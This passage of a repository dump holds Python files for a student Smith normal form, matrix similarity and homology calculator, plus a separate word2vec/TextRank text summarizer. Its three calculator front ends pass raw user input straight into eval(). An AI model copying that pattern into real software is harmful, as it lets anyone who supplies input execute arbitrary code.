__repr__(self):\r\n '''initializes a string representation for matrices'''\r\n return str(self.list)\r\n\r\n def __str__(self):\r\n '''initializes the string method using repr'''\r\n return repr(self)\r\n\r\n def __iter__(self):\r\n '''initializes an iterable for matrices'''\r\n return iter(self.list)\r\n\r\n def col(self, index):\r\n '''returns the column vector/matrix for a given index'''\r\n return Matrix1([self.T().list[index]]).T()\r\n\r\n def __add__(self, other):\r\n '''initializes standard matrix addition, entry by entry'''\r\n if self.shape != other.shape:\r\n raise ValueError('Matrices of different sizes')\r\n else:\r\n NewMatrix = []\r\n for row_a, row_b in zip(self, other):\r\n NewRow = []\r\n for a, b in zip(row_a, row_b):\r\n NewRow.append(a+b)\r\n NewMatrix.append(NewRow)\r\n return Matrix1(NewMatrix)\r\n\r\n def __mul__(self, other):\r\n '''initializes standard matrix multiplication and right scalar\r\n multiplication, here we need to copy the matrix in order\r\n to keep the original intact, not implemented by us'''\r\n if type(other) == int: #scalar multiplication to the right\r\n c = copy.deepcopy(self.list)\r\n C = Matrix1(c)\r\n for i in range(self.nrows):\r\n for j in range(self.ncols):\r\n C[i,j] *= other\r\n return C\r\n \r\n elif type(other) == Matrix1 and self.ncols == other.nrows: #matrix multiplication\r\n P = []\r\n for i in range(self.nrows):\r\n row = []\r\n for j in range(other.ncols):\r\n Sum = 0\r\n for k in range(self.ncols):\r\n Sum += self[i,k]*other[k,j]\r\n row.append(Sum)\r\n P.append(row)\r\n return Matrix1(P)\r\n \r\n def __rmul__(self, other): #scalar 
multiplication to the left\r\n '''initializes standard scalar multiplication to the left'''\r\n if type(other) == int:\r\n c = copy.deepcopy(self.list)\r\n C = Matrix1(c)\r\n for i in range(self.nrows):\r\n for j in range(self.ncols):\r\n C[i,j] *= other\r\n return C\r\n\r\n def __sub__(self, other):\r\n '''initializes substraction using scalar multiplication and addition'''\r\n return self + -1*other\r\n\r\n def __eq__(self, other):\r\n '''initializes equal sign for matrices (if every entry is equal)'''\r\n if self.shape != other.shape:\r\n return False\r\n else:\r\n for i in range(self.nrows):\r\n for j in range(self.ncols):\r\n if self[i,j] != other[i,j]:\r\n return False\r\n return True\r\n \r\n\r\n def __ne__(self, other):\r\n '''initializes inequal sign for matrices using __eq__'''\r\n return not self == other\r\n\r\n def rowop1(self, i,j): #All the row operation methods return the matrix\r\n '''exchange rows elementary operation matrix'''\r\n #with the row operation done, without modifying self\r\n E = eye(self.nrows)\r\n return exchange_rows(E,i,j)*self\r\n\r\n def rowop2(self, i, a):\r\n '''multiplying row elementary operation matrix'''\r\n E = eye(self.nrows)\r\n E[i,i] = a\r\n return E*self\r\n\r\n def rowop3(self, i, j, a):\r\n '''subtract rows from each other elementary operation matrix'''\r\n E = eye(self.nrows)\r\n E[i,j] = a\r\n return E*self\r\n\r\n def reduction(self):\r\n '''reduces to upper triangular using Gauss-Jordan elimination'''\r\n c = copy.deepcopy(self.list)\r\n C = Matrix1(c)\r\n D = zeros(self.nrows, self.ncols)\r\n \r\n #Step 1: put all nonzero rows at the top of D.\r\n #This is equivalent to putting all zero rows at bottom.\r\n \r\n k = 0\r\n for i in range(C.nrows):\r\n if C.row(i) != zeros(1, C.ncols):\r\n for j in range(C.ncols):\r\n D[k,j] = C[i,j]\r\n k += 1\r\n \r\n #Step 2: find the leftmost nonzero column and a nonzero entry in it: put it on top\r\n\r\n t = 0 #number of iterations, also row of pivot\r\n j = 0 #column of pivot\r\n\r\n while t != D.nrows-1 and j != D.ncols:\r\n while j != D.ncols and D.col(j) == 2*D.col(j):\r\n j += 1\r\n if j == D.ncols:\r\n return D\r\n i = t\r\n while D[i,j] == 0 and i != D.nrows-1:\r\n i += 1\r\n if D[i,j] == 0:\r\n break\r\n D = D.rowop1(t,i)\r\n #Step 3: reduce all rows below it\r\n for r in range(t+1, D.nrows):\r\n D = D.rowop3(r, t, -D[r,j]/D[t,j])\r\n t += 1\r\n j += 1\r\n return D\r\n \r\n def rank(self):\r\n '''compute rank of matrix based on row-reduction'''\r\n R = self.reduction()\r\n x = 0\r\n for i in R.list:\r\n if not Matrix1([i]) == 2*Matrix1([i]):\r\n x += 1\r\n return x\r\n\r\ndef eye(n):\r\n '''constructs the identity matrix'''\r\n Id = zeros(n,n)\r\n for i in range(n):\r\n Id[i,i] = 1\r\n return Id\r\n \r\ndef zeros(nrows, ncols):\r\n '''constructs the zero matrix'''\r\n M = []\r\n for i in range(nrows):\r\n R = []\r\n for j in range(ncols):\r\n R.append(0)\r\n M.append(R)\r\n return Matrix1(M)\r\n\r\ndef exchange_rows(self, i, j):\r\n '''row operation #1'''\r\n m, n = self.shape\r\n Id = eye(m)\r\n if i == j:\r\n return Id\r\n # The elementary matrix which exchanges rows, is the row exchanged identity\r\n Id[i, i] = 0\r\n Id[j, j] = 0\r\n if i < j:\r\n i, j = j, i\r\n Id[i, i-abs(i-j)] = 1\r\n Id[j, j+abs(i-j)] = 1\r\n return Id\r\n\r\n\r\n#--------TEST---------\r\n'''\r\nM = Matrix1([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\r\nN = Matrix1([[1, 1, 1], [1, 1, 1], [1, 1, 1]])\r\nA = Matrix1([[1, 1, 1], [1, 1, 1], [1, 1, 1]])\r\nH = Matrix1([[1,2],[3,4]])\r\nZ = 
Matrix1([[0,0],[0,0],[0,0]])\r\n'''\r\n#most important reference : https://igraph.org/python/doc/igraph.datatypes-pysrc.html#Matrix.__ne__\r\n\r\n\r\n \r\n" }, { "alpha_fraction": 0.4188340902328491, "alphanum_fraction": 0.4304932653903961, "avg_line_length": 28.135135650634766, "blob_id": "0f9255774183e4d7a1bc8eca9aa830e2884eae2a", "content_id": "8e53bdc4d7ea76389e42f785fa84c1532171bb90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6693, "license_type": "no_license", "max_line_length": 118, "num_lines": 222, "path": "/smith.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\r\nQiu Shi Wang\r\nLouis Philippe Ignatieff\r\nJing Han Sun\r\n\r\nProgramming final project: Smith normal form\r\n\"\"\"\r\n\r\nfrom sympy import *\r\nfrom Matrix1 import *\r\n\r\n#We want this to return a tuple of three matrices: U, D and V, where D=UAV\r\ndef smith(A):\r\n '''computes the Smith Normal form of a matrix'''\r\n nrows, ncols = A.shape\r\n j_t = 0\r\n leftlist = [] #matrices to left multiply onto A, in order\r\n rightlist = [] \r\n for t in range(nrows):\r\n \r\n #step 1: choose pivot\r\n \r\n while A.col(j_t) == zeros(nrows, 1) and j_t != ncols-1:\r\n j_t += 1\r\n if A.col(j_t) == zeros(nrows, 1) and j_t == ncols-1:\r\n break\r\n K = 0\r\n\r\n while A[K, j_t] == 0:\r\n K += 1\r\n leftlist.append(exchange_rows(A, t, K))\r\n A = exchange_rows(A, t, K)*A\r\n\r\n #target row and column\r\n tr = zeros(1, ncols)\r\n tr[0, j_t] = A[t, j_t]\r\n tc = zeros(nrows, 1)\r\n tc[t,0] = A[t,j_t]\r\n while A.row(t) != tr or A.col(j_t) != tc:\r\n \r\n #step 2: improve pivot\r\n \r\n for k in range(t, nrows):\r\n if A[k,j_t] % A[t,j_t] != 0:\r\n #We use the Bézout property to find integers s and t such that\r\n #A[t,j_t] * s + A[k,j_t] * t = b\r\n\r\n (b,S,T) = egcd(A[t, j_t], A[k, j_t])\r\n alpha = A[t, j_t]//b\r\n gamma = A[k, j_t]//b\r\n\r\n L_0 = Matrix1([[S, T], [-gamma, alpha]])\r\n Id = eye(nrows)\r\n Id[t,t] = S\r\n Id[t, k] = T\r\n Id[k, t] = -gamma\r\n Id[k, k] = alpha\r\n\r\n leftlist.append(Id)\r\n A = Id*A\r\n \r\n #step 3: eliminating\r\n \r\n leftlist.append(RRcol(A, j_t))\r\n A = RRcol(A, j_t)*A\r\n\r\n \r\n #step 4: repeat step 2 and 3 for columns\r\n \r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n t, j_t = j_t, t #transpose\r\n \r\n\r\n for k in range(t, nrows):\r\n if A[k, j_t] % A[t, j_t] != 0:\r\n #We use the Bézout property to find integers s and t such that\r\n #A[t, j_t] * s + A[k, j_t] * t = b\r\n\r\n (b, S, T) = egcd(A[t, j_t], A[k, j_t])\r\n alpha = A[t, j_t]//b\r\n gamma = A[k, j_t]//b\r\n\r\n L_0 = Matrix1([[S, T], [-gamma, alpha]])\r\n Id = eye(nrows)\r\n Id[t,t] = S\r\n Id[t, k] = T\r\n Id[k, t] = -gamma\r\n Id[k, k] = alpha\r\n\r\n rightlist.append(Id.T()) #append the transpose\r\n A = Id*A\r\n\r\n rightlist.append(RRcol(A, j_t).T())\r\n A = RRcol(A, j_t)*A\r\n\r\n A = A.T() #transpose back\r\n nrows, ncols = A.shape \r\n t, j_t = j_t, t #transpose back\r\n\r\n tr[0, j_t] = A[t, j_t] #check target row and column5\r\n tc[t, 0] = A[t,j_t]\r\n \r\n j_t += 1\r\n if j_t >= ncols:\r\n break\r\n \r\n #step 5: switch rows of A^T such that the nonzero entries are all on the diagonal\r\n\r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n for i in range(nrows):\r\n if A.row(i) != zeros(1, ncols):\r\n j = 0\r\n while A[i, j] == 0:\r\n j += 1\r\n rightlist.append(exchange_rows(A, i, j).T())\r\n A = exchange_rows(A, i, j)*A\r\n A = A.T()\r\n nrows, ncols = A.shape\r\n \r\n #step 6: 
ensure that the divisibility criterion is satisfied\r\n\r\n Nc = 0\r\n while A.col(Nc) != zeros(nrows, 1):\r\n Nc+=1\r\n if Nc == ncols:\r\n break\r\n Nr = 0\r\n while A.row(Nr) != zeros(1, ncols):\r\n Nr+=1\r\n if Nr == nrows:\r\n break\r\n\r\n N = min(Nc, Nr) \r\n #N is now the total number of nonzero entries/rows/columns\r\n for i in range(N-1):\r\n if int(A[i+1, i+1]) % int(A[i, i]) != 0:\r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n Id = eye(nrows)\r\n Id[i, i+1] = 1\r\n rightlist.append(Id.T())\r\n A = Id*A\r\n beta = gcd(int(A[i, i]), int(A[i+1, i+1]))\r\n \r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n Id = eye(nrows)\r\n Id[i, i+1] = int((beta-A[i, i])//(A[i+1, i+1]))\r\n leftlist.append(Id)\r\n A = Id*A\r\n\r\n #step 3 again\r\n leftlist.append(RRcol(A, i))\r\n A = RRcol(A, i)*A\r\n\r\n A = A.T()\r\n nrows, ncols = A.shape\r\n rightlist.append(RRcol(A, i).T())\r\n A = RRcol(A, i)*A\r\n\r\n A = A.T()\r\n nrows, ncols = A.shape\r\n\r\n #Step 7: make all the entries in the Smith normal form positive\r\n #This can be done because the operator of multiplying a row by -1 is invertible\r\n #over Z. In fact, it is its own inverse.\r\n\r\n Id = eye(nrows)\r\n for i in range(N):\r\n if sign(A[i, i]) == -1: #if an entry is negative\r\n Id[i, i] = -1\r\n leftlist.append(Id)\r\n A = Id*A\r\n \r\n L0 = eye(nrows) #Multiply together the (invertible) matrices in the leftlist and the rightlist\r\n #to create the matrices U and V\r\n for L in leftlist:\r\n L0 = L*L0\r\n R0 = eye(ncols)\r\n for R in rightlist:\r\n R0 = R0*R\r\n return (A, L0, R0)\r\n \r\ndef RRcol(A, j_t):\r\n '''Row reduces the j_t-th column, leaving only the uppermost entry nonzero'''\r\n nrows, ncols = A.shape\r\n i = 0\r\n while A[i, j_t] == 0:\r\n i += 1\r\n Id = eye(nrows)\r\n for k in range(i+1, nrows):\r\n Id[k, i] = -A[k, j_t]//A[i, j_t]\r\n return Id\r\n \r\ndef exchange_rows(self, i, j):\r\n '''exchange 2 rows'''\r\n m, n = self.shape\r\n Id = eye(m)\r\n if i == j:\r\n return Id\r\n # The elementary matrix which exchanges rows, is the row exchanged idendity\r\n Id[i, i] = 0\r\n Id[j, j] = 0\r\n if i < j:\r\n i, j = j, i\r\n Id[i, i-abs(i-j)] = 1\r\n Id[j, j+abs(i-j)] = 1\r\n return Id\r\n\r\n# Not my code from this line down: found at https://www.techiedelight.com/extended-euclidean-algorithm-implementation/\r\n# This is an implementation of the extended Euclidean algorithm to find the coefficients\r\n# that satisfy Bézout's identity\r\n\r\ndef egcd(a, b):\r\n a, b = int(a), int(b)\r\n if a == 0:\r\n return (b, 0, 1)\r\n else:\r\n gcd, x, y = egcd(b % a, a)\r\n return (gcd, y - (b//a) * x, x) #The last two numbers are our s and t\r\n" }, { "alpha_fraction": 0.6434316635131836, "alphanum_fraction": 0.6595174074172974, "avg_line_length": 27.760000228881836, "blob_id": "dbf98bee26ed57d3a874dc0a94b81b35d594e50b", "content_id": "5a3bc0646e43d4824248c38bc7bfcf1185ae66c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 746, "license_type": "no_license", "max_line_length": 105, "num_lines": 25, "path": "/smithcalc.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\r\nQiu Shi Wang\r\nLouis Philippe Ignatieff\r\nJing Han Sun\r\n\r\nProgramming final project: Smith normal form user interface\r\n\"\"\"\r\n\r\nfrom sympy import *\r\nfrom smith import *\r\ninit_printing(use_unicode=True)\r\n\r\nprint(\"Smith normal form calculator\")\r\nprint(\"\\n\")\r\nprint(\"For an integer matrix A, this program will 
return, in order, a tuple of\")\r\nprint(\"matrices D, U and V such that D is in Smith normal form and D=UAV for invertible U and V\")\r\nprint(\"\\n\")\r\nprint(\"Enter an integer matrix in the form of a Python list of its rows, each of which is a Python list\")\r\nprint(\"Example input: [[1,3,4],[3,-4,0],[-2,-2,6]]\")\r\nwhile 1 == 1:\r\n x=input()\r\n eval(\"print(smith(Matrix1(\"+ x +\")))\")\r\n print(\"\\n\")\r\n\r\n#this line allows the console to stay open after the first input()\r\n\r\n" }, { "alpha_fraction": 0.5465116500854492, "alphanum_fraction": 0.5755813717842102, "avg_line_length": 26.446807861328125, "blob_id": "b4c1a232b9b4feb9e8e3a9cc79bc11f91bf88d7b", "content_id": "591b65017e003f0f222ab1a348758d5e5d06feeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2580, "license_type": "no_license", "max_line_length": 87, "num_lines": 94, "path": "/similarity.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\nQiu Shi Wang\nLouis Philippe Ignatieff\nJing Han Sun\n\nProgramming final project: Matrix similarity\n\"\"\"\nfrom smith import *\nfrom Matrix1 import *\n\n'''Verify if 2 matrices are similar using their Smith Normal form'''\n\ndef poly(A, x): \n '''create the characteristic polynomial and plug in the values'''\n #A = Matrix1(a)\n if A.shape[0] != A.shape[1]: #verify if it's a square matrix\n raise ValueError('matrix is not square')\n\n I = eye(A.shape[0]) #set up the identity matrix of the right size\n\n pA = A - x*I\n\n return pA\n\ndef similarity(a, b):\n A = Matrix1(a)\n B = Matrix1(b)\n if A.shape != B.shape: #verify if their sizes match\n raise ValueError('matrices are not the same size')\n elif A.shape[0] != A.shape[1] or B.shape[0] != B.shape[1]:\n raise ValueError('matrix is not square')\n\n \n valuesA = [] #smith forms of pA\n valuesB = [] #smith forms of pB\n\n #then compare if valuesA match valuesB\n\n #if 2 polynomials of degree at most n have the same values on n+1 points,\n #then they are the same polynomial\n \n n = 0 #number of test values must be at least the size of the matrix + 1\n x = -1 #to plus each value of x into A - xI starting from x = 0\n\n while n <= A.shape[0]:\n x += 1\n #choose values of x such that A - xI is not singular\n #so verify that its rank is equal to its size=\n if poly(A, x).rank() == A.shape[0] and poly(B, x).rank() == B.shape[0]:\n pA = smith(poly(A, x)) #compute the smith form for each given value of x\n #between x = 0 to x = n\n valuesA.append(pA[0])\n\n pB = smith(poly(B, x))\n valuesB.append(pB[0])\n\n n += 1\n\n return valuesA == valuesB #if this is true then it's similar\n\n\nprint(\"Matrix similarity calculator\")\nprint(\"\\n\")\nprint(\"Enter two square matrices of the same size, A and B, with a comma between them\")\nprint(\"Example input: [[-1, 6],[-2, 6]],[[3, 0], [0, 2]]\")\n\nwhile 1 == 1:\n x=input()\n tf=bool()\n E=eval(\"similarity(\"+x+\")\")\n if E==True:\n print(\"The two matrices are similar\")\n elif E==False:\n print(\"The two matrices are not similar\")\n\ninput()\n #This prevents the console from exiting after the user puts the input\n\n#------------TEST----------\n'''\nA = [[-1, 6],[-2, 6]]\nB = [[3, 0], [0, 2]]\n\nC = [[2, -1], [1, 5]]\nD = [[82, 101], [-61, -75]]\n\nE = [[5, 1, 0], [0, 5, 1], [0, 0, 6]]\nF = [[5, 0, 0], [0, 5, 1], [0, 0, 6]]\n\n\na = similarity(A, B) #they are similar\nc = similarity(C, D) #they are similar\ne = similarity(E, F) #they are not similar\n'''\n" }, { 
"alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 23.799999237060547, "blob_id": "c2a30dc46739a3b6efa19ba32f84ba9325b23e90", "content_id": "ceb7b40cbac8cca98e9ab86e8d7bea85a30b6240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 124, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/README.md", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "# Smith Normal Form Calculator\n\nBy Qiushi Wang, Louis Philippe Ignatieff, and Jing Han Sun.\n\nVisit documentation.pdf for information about this project.\n" }, { "alpha_fraction": 0.569327712059021, "alphanum_fraction": 0.591911792755127, "avg_line_length": 32, "blob_id": "b57bfc19d426668477ffa312674823a8f136bf63", "content_id": "bc5d14a276077fbbf7eefd4cb1fde887ecdba69b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1904, "license_type": "no_license", "max_line_length": 242, "num_lines": 56, "path": "/homology.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\r\nQiu Shi Wang\r\nLouis Philippe Ignatieff\r\nJing Han Sun\r\n\r\nProgramming final project: Homology of a chain complex\r\n\"\"\"\r\n\r\nfrom sympy import *\r\nfrom smith import *\r\n\r\ndef Homology(a,b):\r\n A=Matrix1(a)\r\n B=Matrix1(b)\r\n if A.shape[0]!=B.shape[1]:\r\n return (\"Matrices are of the wrong size\")\r\n elif not B*A==zeros(B.shape[0], A.shape[1]):\r\n return (\"BA!=0, not a chain complex\")\r\n k=0\r\n S=smith(A)[0] #first matrix\r\n Elemdivisors=[]\r\n for i in range(min(S.shape[0], S.shape[1])):\r\n k = S[i][i]\r\n if k!=0:\r\n Elemdivisors.append(k)\r\n answer=[\"The homology of the complex at the middle term is the direct sum of\"]\r\n if A.shape[0]-A.rank()-B.rank()!=0:\r\n answer.append(\" Z^\"+str(A.shape[0]-A.rank()-B.rank()))\r\n for i in Elemdivisors:\r\n if i!=1: \r\n answer.append(\" Z/\"+str(i))\r\n if len(answer)==1:\r\n return \"The homology of the complex at the middle term is the trivial group.\"\r\n ansstring=\"\"\r\n if len(answer)==2:\r\n return \"The homology of the complex at the middle term is\"+answer[1]+\".\"\r\n \r\n for j in range(len(answer)-1):\r\n ansstring+=answer[j]\r\n ansstring+=\" and\"\r\n ansstring+=answer[len(answer)-1]\r\n ansstring+=\".\" \r\n\r\n return ansstring\r\n\r\nprint(\"Homology calculator\")\r\nprint(\"\\n\")\r\nprint(\"For a chain complex of finitely generated free abelian groups Z^m -> Z^n -> Z^k where A:Z^m -> Z^n and B:Z^n -> Z^k are homomorphisms represented by matrices, the calculator outputs thehomology group at the middle term H=ker(B)/im(A)\")\r\nprint(\"\\n\")\r\nprint(\"Enter integer matrices A and B with a comma between them. Note that homology is only defined when BA=0.\")\r\nprint(\"Example input: [[1,2,5,4],[2,4,10,0],[1,2,5,4]], [[1,0,-1],[0,0,0]]\")\r\n\r\nwhile 1 ==1:\r\n x=input()\r\n eval(\"print(Homology(\"+x+\"))\")\r\n#This prevents the console from exiting after the user puts the input\r\n" } ]
6
NBsyxx/Extractive_Summerizer_on_Web
https://github.com/NBsyxx/Extractive_Summerizer_on_Web
f6b7ead5b0d3c9c08da54dd67fac7a5e5ffd88fa
c05dd07ed62cd32e9d9071d82d3321d00984124e
b81e6ff2373317410849d14dbc086a2e30a120e7
refs/heads/master
2022-03-02T22:09:36.940800
2019-09-29T16:11:46
2019-09-29T16:11:46
183268446
1
2
null
null
null
null
null
[ { "alpha_fraction": 0.5099278092384338, "alphanum_fraction": 0.5251203179359436, "avg_line_length": 30.42926788330078, "blob_id": "19181c32ac9545437ffe009865fd78011e20d8d5", "content_id": "f2092726eb1dba5613af88a467dde0535c1f5121", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6648, "license_type": "no_license", "max_line_length": 109, "num_lines": 205, "path": "/textRank.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\r\nimport math\r\nimport numpy as np\r\nfrom nltk.tokenize import word_tokenize\r\nimport time\r\n\r\n\r\ntime_start = time.time()\r\nglobal stop_word_list\r\nglobal model\r\n\r\n\r\nstop_word_list = [\"i\", \"me\", \"my\", \"myself\", \"we\", \"our\", \"ours\", \"ourselves\",\r\n \"you\", \"your\", \"yours\", \"yourself\", \"yourselves\", \"he\", \"him\",\r\n \"his\", \"himself\", \"she\", \"her\", \"hers\", \"herself\", \"it\", \"its\",\r\n \"itself\", \"they\", \"them\", \"their\", \"theirs\", \"themselves\", \"what\",\r\n \"which\", \"who\", \"whom\", \"this\", \"that\", \"these\", \"those\", \"am\", \"is\",\r\n \"are\", \"was\", \"were\", \"be\", \"been\", \"being\", \"have\", \"has\", \"had\",\r\n \"having\", \"do\", \"does\", \"did\", \"doing\", \"a\", \"an\", \"the\", \"and\", \"but\",\r\n \"if\", \"or\", \"because\", \"as\", \"until\", \"while\", \"of\", \"at\", \"by\", \"for\",\r\n \"with\", \"about\", \"against\", \"between\", \"into\", \"through\", \"during\", \"before\",\r\n \"after\", \"above\", \"below\", \"to\", \"from\", \"up\", \"down\", \"in\", \"out\", \"on\", \"off\",\r\n \"over\", \"under\", \"again\", \"further\", \"then\", \"once\", \"here\", \"there\", \"when\",\r\n \"where\", \"why\", \"how\", \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"most\",\r\n \"other\", \"some\", \"such\", \"no\", \"nor\", \"not\", \"only\", \"own\", \"same\", \"so\", \"than\",\r\n \"too\", \"very\", \"s\", \"t\", \"can\", \"will\", \"just\", \"don\", \"should\", \"now\"]\r\n\r\n# Load the pre-trained model as global\r\nmodel = word2vec.Word2Vec.load(\"realTrained.model\")\r\n\r\n\r\ndef cut_sentences(sentence):\r\n puns = frozenset('.')\r\n tmp = []\r\n for ch in sentence:\r\n tmp.append(ch)\r\n if puns.__contains__(ch):\r\n yield ''.join(tmp)\r\n tmp = []\r\n yield ''.join(tmp)\r\n\r\n\r\ndef two_sentences_similarity(sents_1, sents_2):\r\n counter = 0\r\n for sent in sents_1:\r\n if sent in sents_2:\r\n counter += 1\r\n return counter / (math.log(len(sents_1) + len(sents_2)))\r\n\r\n\r\ndef cosine_similarity(vec1, vec2):\r\n tx = np.array(vec1)\r\n ty = np.array(vec2)\r\n cos1 = np.sum(tx * ty)\r\n cos21 = np.sqrt(sum(tx ** 2))\r\n cos22 = np.sqrt(sum(ty ** 2))\r\n cosine_value = cos1 / float(cos21 * cos22)\r\n return cosine_value\r\n\r\n\r\ndef clear_oov(sents):\r\n temp = []\r\n for word in sents[1:]:\r\n if word in model.wv.vocab:\r\n temp.append(word)\r\n return temp\r\n\r\n\r\ndef compute_similarity_by_avg(sents_1, sents_2):\r\n if len(sents_1) == 0 or len(sents_2) == 0:\r\n return 0.0\r\n sents_1 = clear_oov(sents_1)\r\n sents_2 = clear_oov(sents_2)\r\n vec1 = model[sents_1[0]]\r\n for word1 in sents_1[1:]:\r\n vec1 = vec1 + model[word1]\r\n vec2 = model[sents_2[0]]\r\n for word2 in sents_2[1:]:\r\n vec2 = vec2 + model[word2]\r\n similarity = cosine_similarity(vec1 / len(sents_1), vec2 / len(sents_2))\r\n return similarity\r\n\r\n\r\ndef calculate_score(weight_graph, scores, i):\r\n length = len(weight_graph)\r\n d = 
0.85\r\n added_score = 0.0\r\n for j in range(length):\r\n denominator = 0.0\r\n fraction = weight_graph[j][i] * scores[j]\r\n for k in range(length):\r\n denominator += weight_graph[j][k]\r\n if denominator == 0:\r\n denominator = 1\r\n added_score += fraction / denominator\r\n weighted_score = (1 - d) + d * added_score\r\n return weighted_score\r\n\r\n\r\ndef weight_sentences_rank(weight_graph):\r\n scores = [0.5 for _ in range(len(weight_graph))]\r\n old_scores = [0.0 for _ in range(len(weight_graph))]\r\n while different(scores, old_scores):\r\n for i in range(len(weight_graph)):\r\n old_scores[i] = scores[i]\r\n for i in range(len(weight_graph)):\r\n scores[i] = calculate_score(weight_graph, scores, i)\r\n return scores\r\n\r\n\r\ndef different(score_1,score_2):\r\n difference = []\r\n for i in range(0, score_1.__len__()):\r\n difference.append(score_1[i]-score_2[i])\r\n sum_of_square = 0\r\n for j in difference:\r\n sum_of_square += j * j\r\n print('Difference:', sum_of_square)\r\n if sum_of_square < 0.00001:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef create_graph(sents):\r\n texts = len(sents)\r\n graph = {}\r\n for i in range(0,texts):\r\n temp = {}\r\n for j in range(0,texts):\r\n temp[j] = compute_similarity_by_avg(sents[i], sents[j])\r\n graph[i] = temp\r\n return graph\r\n\r\n\r\ndef filter_stop_words(sents):\r\n filtered_list = []\r\n for sent in sents:\r\n if sent not in stop_word_list:\r\n filtered_list.append(sent)\r\n return filtered_list\r\n\r\n\r\ndef summarize(text, n):\r\n tokens = cut_sentences(text)\r\n sentences = []\r\n sents = []\r\n for sent in tokens:\r\n temp = [word for word in word_tokenize(sent) if word]\r\n if temp.__len__()>= 6:\r\n sents.append(temp)\r\n sentences.append(sent)\r\n sents = filter_stop_words(sents)\r\n graph = create_graph(sents)\r\n scores = weight_sentences_rank(graph)\r\n print('----------Scores Calculated------------')\r\n print(scores)\r\n\r\n # if you want to output percentage of code, modify here!!\r\n #n = int(len(sentences)*0.2)\r\n sent_selected = nlargest(n, scores)\r\n sent_index = []\r\n for i in range(n):\r\n sent_index.append(sent_selected[i][1])\r\n sent_index.sort()\r\n print('---Sentences Returned--- with', sent_selected.__len__()/sents.__len__(),'---of the sentence kept')\r\n return [sentences[i] for i in sent_index]\r\n\r\n\r\ndef count_sentence_with_score(compare_score,scores):\r\n count = 0\r\n for score in scores:\r\n if score > compare_score:\r\n count += 1\r\n return count\r\n\r\n\r\ndef nlargest(n, iterable):\r\n rank_list = []\r\n count = 0\r\n for i in iterable:\r\n rank_list.append((i, count))\r\n count += 1\r\n rank_list.sort(key = lambda a : a[0],reverse=True)\r\n return rank_list[0:n]\r\n\r\n\r\nif __name__ == '__main__':\r\n time_start = time.time()\r\n file = open(\"input.txt\", \"r\",errors='ignore')\r\n original_text = file.read()\r\n text = original_text.replace('\\n', '')\r\n file.close()\r\n print('-----------The Original Text is:----------------------')\r\n print(original_text)\r\n print('------------------------------------------------------')\r\n\r\n num_of_sents = int(input('Number Sentences for Generated Summary?\\n'))\r\n summarize_text = summarize(text, num_of_sents)\r\n print('-----------Running-------------------------------------')\r\n\r\n for i in summarize_text:\r\n print(i)\r\n time_end = time.time()\r\n print('It takes '+str(time_end-time_start)+'s to extract Summary')\r\n" }, { "alpha_fraction": 0.698443591594696, "alphanum_fraction": 0.7276264429092407, "avg_line_length": 
35.64285659790039, "blob_id": "d910e6a690c245b92943d495ec303373fd2a4643", "content_id": "894c6de6d1897098955098a9d78eda29473586a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 95, "num_lines": 14, "path": "/Continue_Training.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\nimport logging\n\n\ndef train(filename, model_name):\n model = word2vec.Word2Vec.load(model_name)\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n sentences = word2vec.LineSentence(filename, max_sentence_length=100000)\n model.train(sentences, total_examples=len(list(sentences)), epochs=15)\n model.save(model_name)\n\n\nfor i in range(0,13):\n train('Training_corpus/corpus_wiki_{}.txt'.format(str(i)),'RealTrained.model')\n\n" }, { "alpha_fraction": 0.7372262477874756, "alphanum_fraction": 0.7477696537971497, "avg_line_length": 25.12765884399414, "blob_id": "8453edf633da01f08d1d75707a3e47d1a5ad471c", "content_id": "40ae4370b31016b3996088969c903a7aaf46c92c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 120, "num_lines": 47, "path": "/README.md", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "# English_Extractive_Summarizer\nAn extractive summarizer for English, based on word2Vec and text rank\n\n\n\n#---------Instructions-------------\n\ngit clone \n\nmake sure the trained model is in folder.\n\n------test word2vec:---\n\n1. install gensim package by typing (Linux)\n\n>>pip3 install gensim \n\n2. type \n\n>>python3 word2vec_text.py\n\nand hit enter\n\n------- SUMMARIZER-----\n\nAutomatic summarize:\n\n1. name source text as 'input.txt', make sure it's in folder \n\n2. type\n\n>>python3 textRank.py\n\nand hit enter\n\n* for percentage output, uncomment line 160 in textRank.py\n\n\n\n#---------Development Ideas--------\n\nThis summarizer aims to extract several most important sentences in a piece of formally written English Material,\nit ranks the sentences in text and gives the most important ones.\nthe extraction is based on calculated score of each sentence in the context. The score is calculated based on textrank,\nwhich reveals the 